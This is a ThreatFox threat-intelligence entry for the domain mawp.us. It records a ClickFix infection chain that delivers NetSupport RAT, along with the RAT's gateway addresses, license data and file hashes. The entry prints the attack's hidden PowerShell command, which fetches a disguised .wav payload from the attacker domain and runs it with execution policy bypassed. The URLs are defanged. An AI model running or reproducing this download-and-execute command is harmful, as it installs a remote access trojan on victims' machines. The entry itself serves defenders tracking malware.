ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain mawp.us.
Database Entry
| IOC ID: | 1624269 |
|---|---|
| IOC: | mawp.us |
| IOC Type : | domain |
| Threat Type : | payload_delivery |
| Malware: | NetSupportManager RAT |
| Malware alias: | NetSupport |
| Confidence Level : | Confidence level is high (100%) |
| Is compromised? : | False |
| ASN: | AS209242 CLOUDFLARESPECTRUM |
| Country: |  US |
| First seen: | 2025-10-22 05:48:55 UTC |
| Last seen: | never |
| UUID: | 4851e6bc-aea8-11f0-894e-42010aa4000a |
| Reporter |  rmceoin |
| Reward | 5 credits from ThreatFox |
| Tags: | ClickFix NetSupport |
rmceoin
(compromised)->
INJECTED:
<script src="hXXps://static-hotjar[.]com/hotjar-3188784.js"></script>
->
hXXps://static-hotjar[.]com/hotjar-3188784.js
(check for wallet extension)
->
hXXps://hollywoodquarterly[.]com/remote.html
(ClickFix)
->
powershell -w h -nop -c "$a=Join-Path $env:APPDATA 't0g9\\96djli[.]ps1';md (Split-Path $a) -ea 0;$u='hXXps://mawp[.]us/U3A.wav';iwr $u -o $a;& powershell -w h -ep Bypass -f $a"
->
hXXps://mawp[.]us/U3A.wav
(saved as 96djli[.]ps1)
->
NetSupport RAT
GatewayAddress=109[.]107.175.17:443
SecondaryGateway=utahlvs[.]com:443
licensee=KAKAN
serial_no=NSM789508
37d1d033e19cf9dc7313846d9d4026b03d2f822efccd963e5697e9633a4df0d0 mawp[.]us/U3A.wav (US/CA)
de98ed4d3d7cd36e024184d4dca30760b0da99831671f1593f41c1f3d62b32f7 mawp[.]us/M33.wav